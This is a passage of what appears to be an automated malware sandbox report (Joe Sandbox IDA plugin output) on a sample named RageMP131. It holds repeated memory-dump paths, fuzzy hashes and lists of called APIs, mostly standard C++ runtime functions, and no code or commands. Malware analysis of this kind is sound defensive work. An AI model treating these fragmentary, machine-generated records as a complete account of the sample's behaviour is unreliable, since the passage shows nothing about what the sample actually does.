                                    • Associated: 00000018.00000002.3729093902.00000000003A3000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3729912218.00000000003A7000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3730064373.00000000003BA000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3730064373.000000000053D000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3730064373.000000000061B000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3730064373.0000000000658000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3730064373.0000000000661000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3730064373.000000000066F000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3733543630.0000000000670000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3734071449.000000000081D000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3734148518.000000000081E000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3734237528.0000000000821000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3734318413.0000000000822000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_24_2_270000_RageMP131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AllocateHeap
                                    • String ID:
                                    • API String ID: 1279760036-0
                                    • Opcode ID: cbf76a132a306081f86ca24bfb4fc4d36330ddcba0f8c3aa6fa9a7328cb89f45
                                    • Instruction ID: 88d8d3b3213c83e4651352866c379e3c06becb1b816a8ef657d610d0f4b74b51
                                    • Opcode Fuzzy Hash: cbf76a132a306081f86ca24bfb4fc4d36330ddcba0f8c3aa6fa9a7328cb89f45
                                    • Instruction Fuzzy Hash: B4F0E93260962466DB236E66CC01F9B3B8C9F41760B2AC111EC449B09CCB20DE0092E5
                                    APIs
                                    • RtlAllocateHeap.NTDLL(00000000,?,?,?,0034DD3B,?,?,?,?,?,00272D8D,0034ADBC,?,?,0034ADBC), ref: 0036451F
                                    Memory Dump Source
                                    • Source File: 00000018.00000002.3729093902.0000000000271000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00270000, based on PE: true
                                    • Associated: 00000018.00000002.3728609289.0000000000270000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3729093902.00000000003A3000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3729912218.00000000003A7000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3730064373.00000000003BA000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3730064373.000000000053D000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3730064373.000000000061B000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3730064373.0000000000658000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3730064373.0000000000661000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3730064373.000000000066F000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3733543630.0000000000670000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3734071449.000000000081D000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3734148518.000000000081E000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3734237528.0000000000821000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3734318413.0000000000822000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_24_2_270000_RageMP131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AllocateHeap
                                    • String ID:
                                    • API String ID: 1279760036-0
                                    • Opcode ID: f08e5df31d0e3606fd9558ceb1a10bb2910443ec4be01c6eabc4459e09dce031
                                    • Instruction ID: d5a8281267f64e5434b8f01aa46f3e4686ceb5b82d706732d51ac09fb7279c29
                                    • Opcode Fuzzy Hash: f08e5df31d0e3606fd9558ceb1a10bb2910443ec4be01c6eabc4459e09dce031
                                    • Instruction Fuzzy Hash: D0E09B3194171157D6233A659C01B5B3A8DDF437B1F179121EE469B0D9DA50CD0041AA
                                    Memory Dump Source
                                    • Source File: 00000018.00000002.3744640469.0000000004E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_24_2_4e20000_RageMP131.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 12d9cac952fb9c5dd7d0f31804fc726fef01be68daf56ddb514c3f418a82ef24
                                    • Instruction ID: d6b6fd8a14ac1dc4bbb491a6fb58dd72c70ef546d0bd924391bbef1cca6209d0
                                    • Opcode Fuzzy Hash: 12d9cac952fb9c5dd7d0f31804fc726fef01be68daf56ddb514c3f418a82ef24
                                    • Instruction Fuzzy Hash: B021D2EB24C170BDF20285512B58EFB6B2EE3D67347309557FA02D45C3E28A1A8E7132
                                    Memory Dump Source
                                    • Source File: 00000018.00000002.3744640469.0000000004E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_24_2_4e20000_RageMP131.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 7d6eeb62d8b9bec524e399760a4010c729a0f6d9e5aac2cf416930b49a82aeed
                                    • Instruction ID: 9dfdd20ed8f87ad931f89f64a18153df2252e64b3e0a99313ac15d37baa3e20a
                                    • Opcode Fuzzy Hash: 7d6eeb62d8b9bec524e399760a4010c729a0f6d9e5aac2cf416930b49a82aeed
                                    • Instruction Fuzzy Hash: BB212AEB34C134BDF21284426B14EFA6A2EE3C67747319827FA07D5582F2896A4D7071
                                    Memory Dump Source
                                    • Source File: 00000018.00000002.3744640469.0000000004E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_24_2_4e20000_RageMP131.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: ca465a41762601d08956737c0ec7a623c53a309fc8df381eea998bc6151981c7
                                    • Instruction ID: b7005e6c5c274e97c7b6f2c1908297d3a528027550e19afec7ef85d5745ae443
                                    • Opcode Fuzzy Hash: ca465a41762601d08956737c0ec7a623c53a309fc8df381eea998bc6151981c7
                                    • Instruction Fuzzy Hash: 74212CEB24C134BDF25284426B14EFA6B2DE3C67747319927FA07D4582F2895A4D7131
                                    Memory Dump Source
                                    • Source File: 00000018.00000002.3744640469.0000000004E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_24_2_4e20000_RageMP131.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: c330c246f8c5485ef6da65ca9ced00138ddb00fe3fb84c1eab1f0bab4d9e53e4
                                    • Instruction ID: 4630a5824a6ea115f71fb8ae3e0e1d1841e8651d63b8e84a9ce41743b3a8921c
                                    • Opcode Fuzzy Hash: c330c246f8c5485ef6da65ca9ced00138ddb00fe3fb84c1eab1f0bab4d9e53e4
                                    • Instruction Fuzzy Hash: CA2130EB24C130BDF21284426B14EF76B2DE3C67747319927FA07E5982F2895A4D7071
                                    Memory Dump Source
                                    • Source File: 00000018.00000002.3744640469.0000000004E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_24_2_4e20000_RageMP131.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: e26439f139d78f267edc89e2fc728f8de3fbf6d11dcb4a5ac06d1dd9a167c923
                                    • Instruction ID: 648ef8447bc2c77e40d6c509449142acf7dc1ba963ee362d7e17a4e1641f78e4
                                    • Opcode Fuzzy Hash: e26439f139d78f267edc89e2fc728f8de3fbf6d11dcb4a5ac06d1dd9a167c923
                                    • Instruction Fuzzy Hash: 24213DEB34C130BCF15285426B14EFA6B2DE3C67747309927FA07E4982F2896A5D7171
                                    Memory Dump Source
                                    • Source File: 00000018.00000002.3744640469.0000000004E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_24_2_4e20000_RageMP131.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: c5b01c265fdd4db75941c60eb41e530dc72fdd69940d8f087c3d6a7c243e5252
                                    • Instruction ID: ac763baf90d56e543f0eb444432721afbb20b3784817c35accc64f7229586d45
                                    • Opcode Fuzzy Hash: c5b01c265fdd4db75941c60eb41e530dc72fdd69940d8f087c3d6a7c243e5252
                                    • Instruction Fuzzy Hash: AA210EEB24C130BCF25285826B14EF75B2EE3C67707319527F907E4986F2891A5D7031
                                    Memory Dump Source
                                    • Source File: 00000018.00000002.3744640469.0000000004E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_24_2_4e20000_RageMP131.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 6bb4d05aeab895e0f7676c755152342539f63721382161fe66e409c4fff98f69
                                    • Instruction ID: 0e0f278123cc8fb61961b21780e874cf786fa2e980d17c45bba3f5242ac9145d
                                    • Opcode Fuzzy Hash: 6bb4d05aeab895e0f7676c755152342539f63721382161fe66e409c4fff98f69
                                    • Instruction Fuzzy Hash: 1A1191EB28C130BCF10284526B18AF66A2EF3C67307319527F907E4982F3891B8D7131
                                    Memory Dump Source
                                    • Source File: 00000018.00000002.3744640469.0000000004E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_24_2_4e20000_RageMP131.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: acef598aca3e400464e1052567681eba8fd2885d7016f469a78721904179bd13
                                    • Instruction ID: 07969448b73629fd546ffa33dc7bb8e8f58698c07339e38901fafe206d3db68f
                                    • Opcode Fuzzy Hash: acef598aca3e400464e1052567681eba8fd2885d7016f469a78721904179bd13
                                    • Instruction Fuzzy Hash: 981130EB28C130BDF15289426B18AF76A2EF3D67707319526F907E4582F3891A4D7131
                                    Memory Dump Source
                                    • Source File: 00000018.00000002.3744640469.0000000004E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_24_2_4e20000_RageMP131.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: df17d9899e454e7d6bd63c119997f9b07ab87665e6a47b9a0c0da35fe4db0a83
                                    • Instruction ID: a86d91a87d5fae3274e58d9c1cc020a3098595fc6f72cb4e45cca51604576cf4
                                    • Opcode Fuzzy Hash: df17d9899e454e7d6bd63c119997f9b07ab87665e6a47b9a0c0da35fe4db0a83
                                    • Instruction Fuzzy Hash: 390140EB68C130BCF24285562B58AFA6B2EE2C27703319526F943E0987F3891A4D7031
                                    Memory Dump Source
                                    • Source File: 00000018.00000002.3744640469.0000000004E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_24_2_4e20000_RageMP131.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 96824d5d59fb784732bca3e4674d1aa37e6f25934a41a915c1ba5701be779f9f
                                    • Instruction ID: 00d7f2bf7906067432c7c7f6617282529fec902a4f4a45fbb87f1e0f565ca0fe
                                    • Opcode Fuzzy Hash: 96824d5d59fb784732bca3e4674d1aa37e6f25934a41a915c1ba5701be779f9f
                                    • Instruction Fuzzy Hash: 37F054E768C130ACE242844627556F55A2EB3D6730371A613F507E5D87B2856B9D7031
                                    Memory Dump Source
                                    • Source File: 00000018.00000002.3744640469.0000000004E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_24_2_4e20000_RageMP131.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 0bd855233e75f2aa0f67916bee38a135a3268e09b0135d7915ecab6386e057db
                                    • Instruction ID: c4238f225e31754842a682a039e2f604e00cedab0e3dd9ff19e0122af48ca406
                                    • Opcode Fuzzy Hash: 0bd855233e75f2aa0f67916bee38a135a3268e09b0135d7915ecab6386e057db
                                    • Instruction Fuzzy Hash: 88F0BEA738C130BCE242894627586F95B2EB3D6330330A613F503E0987B7892B9D7131
                                    Memory Dump Source
                                    • Source File: 00000018.00000002.3744640469.0000000004E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_24_2_4e20000_RageMP131.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 8468138193243b282cf823e628e2124b4f0c07e6bd31875fbab473d920964426
                                    • Instruction ID: e8d53ad9f7b45964f880d6ce111be7c4f3667348f0911da618dda90d79427ade
                                    • Opcode Fuzzy Hash: 8468138193243b282cf823e628e2124b4f0c07e6bd31875fbab473d920964426
                                    • Instruction Fuzzy Hash: 72E0A0B768C330EDE242494567496F56A2EB397230330A217F503A1A87B795675C7021
                                    APIs
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 002DAB43
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 002DAB65
                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 002DAB85
                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 002DABAF
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 002DAC1D
                                    • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 002DAC69
                                    • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 002DAC83
                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 002DAD18
                                    • std::_Facet_Register.LIBCPMT ref: 002DAD25
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000018.00000002.3729093902.0000000000271000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00270000, based on PE: true
                                    • Associated: 00000018.00000002.3728609289.0000000000270000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3729093902.00000000003A3000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3729912218.00000000003A7000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3730064373.00000000003BA000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3730064373.000000000053D000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3730064373.000000000061B000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3730064373.0000000000658000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3730064373.0000000000661000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3730064373.000000000066F000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3733543630.0000000000670000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3734071449.000000000081D000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3734148518.000000000081E000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3734237528.0000000000821000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3734318413.0000000000822000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_24_2_270000_RageMP131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Locinfo::_$Facet_Locinfo_ctorLocinfo_dtorRegister
                                    • String ID: bad locale name
                                    • API String ID: 3375549084-1405518554
                                    • Opcode ID: 4a5b69a57ef61bb398751034a918341ceac49531c8bae2442136d41c3540c00b
                                    • Instruction ID: 3596b0245ef26a5c75a393d1082aa96313cfb37a85fa86b7fecedc98bd6001d1
                                    • Opcode Fuzzy Hash: 4a5b69a57ef61bb398751034a918341ceac49531c8bae2442136d41c3540c00b
                                    • Instruction Fuzzy Hash: 28617BB1D102499FDF12DFA4D845B9EBBF8AF15314F18405AE804AB391EB34ED05CBA2
                                    APIs
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 002737E9
                                    • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00273835
                                    • __Getctype.LIBCPMT ref: 0027384E
                                    • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 0027386A
                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 002738FF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000018.00000002.3729093902.0000000000271000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00270000, based on PE: true
                                    • Associated: 00000018.00000002.3728609289.0000000000270000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3729093902.00000000003A3000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3729912218.00000000003A7000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3730064373.00000000003BA000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3730064373.000000000053D000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3730064373.000000000061B000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3730064373.0000000000658000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3730064373.0000000000661000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3730064373.000000000066F000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3733543630.0000000000670000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3734071449.000000000081D000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3734148518.000000000081E000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3734237528.0000000000821000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3734318413.0000000000822000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_24_2_270000_RageMP131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: std::_$Locinfo::_Lockit$GetctypeLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
                                    • String ID: 0:'$bad locale name
                                    • API String ID: 1840309910-3347340704
                                    • Opcode ID: efc1ab4c46654e921930b174f39d2b2651e7cee445ea4a114a77c16188381243
                                    • Instruction ID: 39b3ddf4b4fd8f74d36719129aff16b12dd018d0dc17708b1b374270bc8143ed
                                    • Opcode Fuzzy Hash: efc1ab4c46654e921930b174f39d2b2651e7cee445ea4a114a77c16188381243
                                    • Instruction Fuzzy Hash: 94515FB1D103499BDF11DFA4D846B9EFBB8AF14310F148169EC08AF241E775EA18DB92
                                    APIs
                                    • _ValidateLocalCookies.LIBCMT ref: 00350507
                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 0035050F
                                    • _ValidateLocalCookies.LIBCMT ref: 00350598
                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 003505C3
                                    • _ValidateLocalCookies.LIBCMT ref: 00350618
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000018.00000002.3729093902.0000000000271000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00270000, based on PE: true
                                    • Associated: 00000018.00000002.3728609289.0000000000270000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3729093902.00000000003A3000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3729912218.00000000003A7000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3730064373.00000000003BA000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3730064373.000000000053D000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3730064373.000000000061B000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3730064373.0000000000658000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3730064373.0000000000661000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3730064373.000000000066F000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3733543630.0000000000670000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3734071449.000000000081D000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3734148518.000000000081E000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3734237528.0000000000821000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3734318413.0000000000822000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_24_2_270000_RageMP131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                    • String ID: csm
                                    • API String ID: 1170836740-1018135373
                                    • Opcode ID: f20598b848e850d1ec2220124021d7a1ce4b5a33389b79949531ac760cd57e4e
                                    • Instruction ID: 8e7dc35871e5cd49398ed5b4bcbe384538ad416425dfcdef370e543c350bf461
                                    • Opcode Fuzzy Hash: f20598b848e850d1ec2220124021d7a1ce4b5a33389b79949531ac760cd57e4e
                                    • Instruction Fuzzy Hash: 2341C430A04208ABCF16DF69C880E9E7BB4AF45325F148455FC18AB362E732DA59CF90
                                    APIs
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 002D9263
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 002D9286
                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 002D92A6
                                    • std::_Facet_Register.LIBCPMT ref: 002D931B
                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 002D9333
                                    • Concurrency::cancel_current_task.LIBCPMT ref: 002D934B
                                    Memory Dump Source
                                    • Source File: 00000018.00000002.3729093902.0000000000271000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00270000, based on PE: true
                                    • Associated: 00000018.00000002.3728609289.0000000000270000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3729093902.00000000003A3000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3729912218.00000000003A7000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3730064373.00000000003BA000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3730064373.000000000053D000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3730064373.000000000061B000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3730064373.0000000000658000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3730064373.0000000000661000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3730064373.000000000066F000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3733543630.0000000000670000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3734071449.000000000081D000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3734148518.000000000081E000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3734237528.0000000000821000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3734318413.0000000000822000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_24_2_270000_RageMP131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                    • String ID:
                                    • API String ID: 2081738530-0
                                    • Opcode ID: 038eb88e9bc25fbc1d5bdd33249a715d382ec711aa3f9f39f2a41899c2de220e
                                    • Instruction ID: 11146d8bd908ba573ada78268ac825660b1f38d7ed96bce9c95b33023ee7288a
                                    • Opcode Fuzzy Hash: 038eb88e9bc25fbc1d5bdd33249a715d382ec711aa3f9f39f2a41899c2de220e
                                    • Instruction Fuzzy Hash: 5941CF71910215AFCF16DF58D885BAEBBB8FF42310F14425AE8046B391D730AD95CBD1
                                    APIs
                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 002760F2
                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 0027617F
                                    • ___std_exception_copy.LIBVCRUNTIME ref: 00276248
                                    Strings
                                    • recursive_directory_iterator::operator++, xrefs: 002761CC
                                    Memory Dump Source
                                    • Source File: 00000018.00000002.3729093902.0000000000271000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00270000, based on PE: true
                                    • Associated: 00000018.00000002.3728609289.0000000000270000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3729093902.00000000003A3000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3729912218.00000000003A7000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3730064373.00000000003BA000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3730064373.000000000053D000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3730064373.000000000061B000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3730064373.0000000000658000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3730064373.0000000000661000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3730064373.000000000066F000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3733543630.0000000000670000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3734071449.000000000081D000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3734148518.000000000081E000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3734237528.0000000000821000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3734318413.0000000000822000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_24_2_270000_RageMP131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ___std_exception_destroy$___std_exception_copy
                                    • String ID: recursive_directory_iterator::operator++
                                    • API String ID: 1206660477-953255998
                                    • Opcode ID: d0df4faeb183193c5760e48c18384fa8a467427eee8f6a9f35b5c5ae4780f301
                                    • Instruction ID: 0594a0cc6d550537fc2993e345aaf3bf4f77f323e2df88938902f8f787ed5c99
                                    • Opcode Fuzzy Hash: d0df4faeb183193c5760e48c18384fa8a467427eee8f6a9f35b5c5ae4780f301
                                    • Instruction Fuzzy Hash: 9BE145B19106049FCB29DF68C845BAEF7F9FF45300F10861DE41A97B81E7B4AA54CBA1
                                    APIs
                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 002786DE
                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 002786ED
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000018.00000002.3729093902.0000000000271000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00270000, based on PE: true
                                    • Associated: 00000018.00000002.3728609289.0000000000270000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3729093902.00000000003A3000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3729912218.00000000003A7000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3730064373.00000000003BA000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3730064373.000000000053D000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 00000018.00000002.3730064373.000000000061B000.00000040.00000001.01000000.0000000B.sdmpDownload File
